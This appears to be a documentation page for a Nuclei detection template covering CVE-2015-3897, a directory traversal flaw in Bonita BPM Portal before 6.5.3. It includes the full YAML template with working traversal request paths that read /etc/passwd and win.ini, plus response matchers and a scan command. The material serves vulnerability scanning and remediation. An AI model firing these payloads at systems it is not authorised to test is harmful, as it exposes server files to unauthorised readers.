Bonita BPM Portal <6.5.3 - Local File Inclusion
ID: CVE-2015-3897
Severity: medium
Author: 0x_Akoko
Tags: cve2015,cve,unauth,packetstorm,bonita,lfi,bonitasoft
Description
Section titled “Description”Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
YAML Source
Section titled “YAML Source”id: CVE-2015-3897
info: name: Bonita BPM Portal <6.5.3 - Local File Inclusion author: 0x_Akoko severity: medium description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource. impact: | An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability. reference: - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html - https://www.bonitasoft.com/ - https://nvd.nist.gov/vuln/detail/CVE-2015-3897 - https://www.htbridge.com/advisory/HTB23259 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-3897 cwe-id: CWE-22 epss-score: 0.74714 epss-percentile: 0.98145 cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: bonitasoft product: bonita_bpm_portal tags: cve2015,cve,unauth,packetstorm,bonita,lfi,bonitasoft
http: - method: GET path: - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd" - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"
stop-at-first-match: true
matchers-condition: or matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and
- type: regex regex: - "root:[x*]:0:0:"# digest: 490a00463044022036ab9257e98452555d746ca5b12d9ee2cd60d679a556b0e60ee270738687e39602201eeef1bd780e1a5e7f27e22a6c3ff77a4bec8978df8b6e4333739a9cc4882e00:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-3897.yaml"